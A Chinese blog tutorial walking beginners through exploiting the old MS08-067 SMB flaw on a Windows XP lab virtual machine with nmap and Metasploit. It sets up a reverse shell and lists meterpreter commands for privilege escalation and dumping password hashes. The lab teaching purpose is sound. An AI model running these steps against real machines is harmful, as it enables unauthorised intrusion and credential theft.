---
title: 经典再现之ms08-067
date: 2017-01-13 21:26:52
tags: Metasploit
categories: Metasploit
---
<h1>                                metasploit----------（还原经典ms08-067）</h1>
虽然这个漏洞比较老套，网上教程也很多，多数的已经修复了这个漏洞。但是比较经典，适用于小白学习，也算是比较简单的一个教程。没什么多大的难度。各位dalao凑合着看看吧！！！！。<img class="alignnone size-full wp-image-2181" src="http://www.secist.com/wp-content/uploads/2016/11/4QM_PA1VCHN_FA2@JM702.jpg" alt="4qm_pa1vchn_fa2jm702" width="85" height="91" />
<!--more-->
<h1><span style="color: #ff0000;">知识科普：</span></h1>
<h3></h3>
<h3><strong><span style="color: #008000;"><span style="color: #000000;">Metasploit</span></span></strong></h3>
<h3><strong><span style="color: #008000;">是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。这些功能包括智能开发，代码审计，Web应用程序扫描，社会工程。团队合作，在Metasploit和综合报告提出了他们的发现。</span></strong></h3>
&nbsp;
<h4><span style="color: #ff0000;"><span style="color: #000000;">SMB：</span></span></h4>
<span style="color: #ff0000;">(Server Message Block)是协议名，它能被用于Wap连接和客户端与服务器之间的信息沟通。常用于共享如：打印机，文件传输等等</span>

&nbsp;
<h4><strong><span style="color: #000000;">ms08-067</span>：</strong></h4>
<span style="color: #008000;">MS08-067漏洞将会影响除Windows <a style="color: #008000;" href="http://baike.baidu.com/view/488131.htm" target="_blank">Server</a> 2008 Core以外的所有Windows系统，包括：Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本，甚至还包括测试阶段的Windows 7 Pre-Beta。（一款08年的陈年老漏洞，就拿来讲讲，算是给新手小白，科普科普）</span>
<div class="para"><b>说明：</b>微软安全公告KB958644</div>
<div class="para"><b>漏洞影响：</b>服务器服务中的漏洞可能允许远程执行代码</div>
<div class="para"><b>发布日期：</b>2008/10/22</div>
<div class="para"><b>下载大小：</b>因操作系统而异。</div>
<div class="para"><b>受影响的操作系统： </b>Windows 2000;XP;Server 2003;<a href="http://baike.baidu.com/subview/8911/8911.htm" target="_blank">Vista</a>;Server 2008;7 Beta</div>
<div class="para">
<div class="para"><b>摘要</b></div>
<div class="para">此安全更新解决了服务器服务中一个秘密报告的漏洞。 如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上，攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。可以通过安装本 Microsoft 更新程序来保护计算机不受侵害。安装后，可能必须重新启动计算机。</div>
<div class="para"><b>严重等级：</b>Windows 2000;XP;Server 2003为严重，Windows Vista;Server 2008;7 Beta为重要。</div>
</div>
修复方案：安装官方补丁

&nbsp;

下面<strong>请观看视频演示：--------由于以前的视频没有那么详细，后来晚上做重新录制了一份出来，做的不好，还望海涵</strong>

<h1><span style="color: #ff0000;">下面是我做的演示视频：</span></h1>

 <h1 id="一言不合的请猛击一下下列视频"><a href="#测试视频播放" class="headerlink" ></a></h1><hr>

<div style="width:640px;height:480px;margin:0 auto;" id="ivaLive"></div>
<script type="text/javascript" src="http://demonsec666.oss-cn-qingdao.aliyuncs.com/cytron.core.js"></script>
<script>
    var ivaInstance = new Iva('ivaLive', {
        appkey: 'By9WGzBIx', //应用标示
        video: 'http://demonsec666.oss-cn-qingdao.aliyuncs.com/11111.mp4', //视频
        title: 'test', //视频标题，后台视频管理中的标题
        cover: '' //视频封面，只有在autoplay:false才可生效
    });
</script>
<script src="http://demonsec666.oss-cn-qingdao.aliyuncs.com/lva.js"></script>


<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=28381276&auto=1&height=66"></iframe>
'

&nbsp;

<span style="color: #ff0000;">以下是视频的内容详解，我将用图文来讲解：</span>

&nbsp;

本次搭建的环境  目标系统  虚拟机 ：<span style="color: #ff0000;">windows  XP SP3（ English）----------WinXPenSP3 是《Metasploit渗透测试魔鬼训练营》里面实验用到的镜像和源代码</span>

<span style="color: #008000;"><span style="color: #000000;">目标ip：</span><span style="color: #ff0000;">192.168.1.102</span></span>

msf利用漏洞： <span style="color: #ff0000;"> 445端口（smb服务漏洞ms08--067）</span>

<span style="color: #008000;">  </span>

攻击者 系统  ： <span style="color: #008000;">mac os</span>

搭载渗透工具：<span style="color: #008000;"> metasploit</span>

目标ip：<span style="color: #008000;">192.168.1.101</span>

&nbsp;
<h1><em><strong><span style="color: #ff0000;">信息收集：</span></strong></em></h1>
在此之前呢  我们有个疑问？就是如何在不知道的情况下得知目标系统的详细信息呢？

1.那么我们就用到kali下的经典老款神器：<span style="color: #008000;">nmap</span>

nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端

我们用nmap 扫描我们整个IP段：用来得知目标系统的 信息配置，端口，ip等详细信息

nmap结合实际情况来使用相应的参数，我这边就直接使用：

<span style="color: #008000;">-A     综合扫描</span>

<span style="color: #008000;">192.168.1.0/24 内网的整个IP段</span>
<pre class="lang:vim decode:true">nmap -A 192.168.1.0/24</pre>
&nbsp;

nmap其中的 扫描结果如下：
<pre class="lang:vim decode:true ">Nmap scan report for 192.168.1.102
Host is up (0.00066s latency).
Not shown: 988 closed ports
PORT     STATE SERVICE         VERSION
25/tcp   open  smtp            Microsoft ESMTP 6.0.2600.5512
| smtp-commands: dh-ca8822ab9589 Hello [192.168.1.108], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK, 
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY 
80/tcp   open  http            Microsoft IIS httpd 5.1
|_http-server-header: Microsoft-IIS/5.1
|_http-title: \xD5\xFD\xD4\xDA\xBD\xA8\xC9\xE8\xD6\xD0
|_http-webdav-scan: ERROR: Script execution failed (use -d to debug)
135/tcp  open  msrpc           Microsoft Windows RPC
139/tcp  open  netbios-ssn     Microsoft Windows netbios-ssn
443/tcp  open  https?
445/tcp  open  microsoft-ds    Windows XP microsoft-ds
777/tcp  open  multiling-http?
1025/tcp open  msrpc           Microsoft Windows RPC
3389/tcp open  ms-wbt-server   Microsoft Terminal Service
6002/tcp open  http            SafeNet Sentinel Protection Server httpd 7.3
|_http-server-header: SentinelProtectionServer/7.3
7001/tcp open  afs3-callback?
7002/tcp open  http            SafeNet Sentinel Keys License Monitor httpd 1.0 (Java Console)
|_http-title: Sentinel Keys License Monitor
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port777-TCP:V=7.25BETA2%I=7%D=11/16%Time=582C6DC5%P=i686-pc-linux-gnu%r
SF:(Kerberos,5,"\x01\0\t\xe0\x06")%r(SMBProgNeg,5,"\x01\0\t\xe0\x06")%r(Te
SF:rminalServer,A,"\x01\0\t\xe0\x06\x01\0\t\xe0\x06")%r(WMSRequest,5,"\x01
SF:\0\t\xe0\x06");
MAC Address: 00:1C:42:09:90:5A (Parallels)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
Service Info: Host: dh-ca8822ab9589; OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_nbstat: NetBIOS name: DH-CA8822AB9589, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 00:1c:42:09:90:5a (Parallels)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: dh-ca8822ab9589
|   NetBIOS computer name: DH-CA8822AB9589
|   Workgroup: WORKGROUP
|_  System time: 2016-11-16T22:33:35+08:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.66 ms 192.168.1.102
</pre>
&nbsp;
<h1><span style="color: #ff0000;"><strong>metasploit漏洞利用：</strong></span></h1>
&nbsp;
<h3><strong>1.接下来打开我们的 metasploit</strong></h3>
已经知道了ip和服务漏洞就可以用msf来进行使用。

输入第一个命令 <span style="color: #ff0000;">用来寻找ms08-067的模块的位置</span>

找具体的exploit可以受用search命令，search支持几种关键字的查询,对于查找模块的search命令希望了解如何使用，就可以在MSF终端中输入help search，MSF终端将会显示该命令的参数列表，包括每个参数的含义及可能的取值。

另外值得说的是在新版msf下  使用命令是不区分大小写的，之前老版本是要区分大小的。

<em><strong>search命令的帮助参数如下：</strong></em>
<pre class="lang:vim decode:true">msf &gt; help search 
Usage: search [keywords]

Keywords:
  app       :  Modules that are client or server attacks
  author    :  Modules written by this author
  bid       :  Modules with a matching Bugtraq ID
  cve       :  Modules with a matching CVE ID
  edb       :  Modules with a matching Exploit-DB ID
  name      :  Modules with a matching descriptive name
  platform  :  Modules affecting this platform
  ref       :  Modules with a matching ref
  type      :  Modules of a specific type (exploit, auxiliary, or post)

Examples:
  search cve:2009 type:exploit app:client</pre>
&nbsp;

那么我们就搜索exp的关键字如下：
<pre class="lang:vim decode:true">search ms08-067</pre>
<img class="wp-image-2151 aligncenter" src="http://www.secist.com/wp-content/uploads/2016/11/549D8865-7ACE-4AA6-B731-B8D097A88C82.png" alt="549d8865-7ace-4aa6-b731-b8d097a88c82" width="681" height="300" />

&nbsp;

2. 对于找出exp的模块位置,使用<span style="color: #008000;"><strong><span style="color: #ff0000;">use</span></strong><span style="color: #000000;">参数(使用</span>)</span> xxxxx模块，进入ms08-067模块，按住键盘的Tab键，即可补全相应的模块位置：

<img class="size-full wp-image-2152 aligncenter" src="http://www.secist.com/wp-content/uploads/2016/11/C1BA23BB-8698-4BE5-BF09-CC48D5392177.png" alt="c1ba23bb-8698-4be5-bf09-cc48d5392177" width="613" height="58" />

&nbsp;

&nbsp;

<strong>3.</strong> 接着我们使用<strong><span style="color: #ff0000;"> show targets</span> </strong>来指定我们的目标系统版本：

<img class="size-full wp-image-2153 aligncenter" src="http://www.secist.com/wp-content/uploads/2016/11/37C57579-B362-4AA4-A897-F183BE9CA2EA.png" alt="37c57579-b362-4aa4-a897-f183be9ca2ea" width="680" height="358" />

&nbsp;

&nbsp;

<strong>4：</strong>设置目标系统的版本------由nmap扫描结果得知：系统版本
<pre class="lang:vim decode:true">set  target 7</pre>
格式为：<span style="color: #ff0000;">set </span>  （设置）   <span style="color: #ff0000;">target  </span> （所受影响的系统版本）  <span style="color: #ff0000;">7</span>（ID ---&gt;1~72    系统的序列号）

<img class="size-full wp-image-2173 aligncenter" src="http://www.secist.com/wp-content/uploads/2016/11/1EU17WG7CFIANQQIX.png" alt="1eu17wg7cfianqqix" width="407" height="143" />

&nbsp;
<h4>5.用<span style="color: #ff0000;">show options  </span>或者<span style="color: #ff0000;">options </span> 用来展示设置选项，查看设置选项是否设置对错或者设置成功。</h4>
&nbsp;

可看到下方的Explolit  target 下栏可看到 已设置完成的选项  （系统版本）

<img class="size-full wp-image-2172 aligncenter" src="http://www.secist.com/wp-content/uploads/2016/11/OHQ78K1PXVK7720C5.png" alt="ohq78k1pxvk7720c5" width="618" height="417" />

<img class="size-full wp-image-2176 aligncenter" src="http://www.secist.com/wp-content/uploads/2016/11/BOYSU_V7RZLG4G_VS.png" alt="boysu_v7rzlg4g_vs" width="648" height="181" />

6.  填写目标ip ------目标ip由nmap扫描得知
<pre class="lang:vim decode:true">set  rhost   192.168.1.102 （跟上一个目标的ip地址）</pre>
接着说上一张图，required 选项栏中，有下方都是yes的选项，这些选项都是必填的，但是有些部分是默认的，我们这里就不动了，只需填写rhost的 目标ip即可。

填写完之后呢，也可以用show  opinions 来查看设置选项  是否设置成功

&nbsp;
<h4><strong>7.设置本机ip反弹shell，监听端口------我这边就直接设置相应的参数  效果和msf的  exploit/multi/handler效果是一样的</strong></h4>
<pre class="lang:vim decode:true">set  lhost    192.168.1.101     （设置本机监听的ip）
set   lports   4444             （设置本机监听的端口）</pre>
<img class="size-full wp-image-2176 aligncenter" src="http://www.secist.com/wp-content/uploads/2016/11/BOYSU_V7RZLG4G_VS.png" alt="boysu_v7rzlg4g_vs" width="648" height="181" />
<h4>8.使用<strong><span style="color: #ff0000;">check</span></strong>命令，来检查是否设置对错，以及检查目标系统是否存在此漏洞</h4>
<img class="size-full wp-image-2177 aligncenter" src="http://www.secist.com/wp-content/uploads/2016/11/N5P8UM6VC2TTNMUY8.png" alt="n5p8um6vc2ttnmuy8" width="655" height="128" />
<h4><strong>9.检查完后，使用<span style="color: #ff0000;">exploit</span>命令来执行本次攻击，得到了meterpreter 会话，在会话中使用help来查看相应的参数</strong></h4>
<img class="size-full wp-image-2178 aligncenter" src="http://www.secist.com/wp-content/uploads/2016/11/QO0TW46ZZMXTXO4U6Y.png" alt="qo0tw46zzmxtxo4u6y" width="664" height="171" />

下面有几个命令是可以用到的，
<p style="padding-left: 60px;"><strong>shell-----反弹cmd会话</strong></p>
<p style="padding-left: 60px;"><strong>sysinfo -----获取目标系统的信息</strong></p>
<p style="padding-left: 60px;"><strong>getuid----查看当前使用的权限</strong></p>
<p style="padding-left: 60px;"><strong>getsystem ----提升权限为system</strong></p>
<p style="padding-left: 60px;"><strong>hashdump-----获取管理员密码</strong></p>
<img class="size-full wp-image-2179 aligncenter" src="http://www.secist.com/wp-content/uploads/2016/11/3PHKWDONJ68WO00S13.png" alt="3phkwdonj68wo00s13" width="730" height="292" />

可更加进一步的提权。

Demon    2016.11.17 更

参考资料：http://www.thinkful.cn/archives/346.html    使用Metasploit工具利用微软MS08-067漏洞攻击服务器

http://baike.baidu.com/link?url=7SNWIRIIXKssagC8YzSxJ3PVL_5Dwr9mv82bbW6kMg0fXC3sPxS_r89dijzh35wlGrxCyQTNVYCycn3DMqT3Yx4VCKbdL41f5WYdDwef5vy                                  ms08-067 百度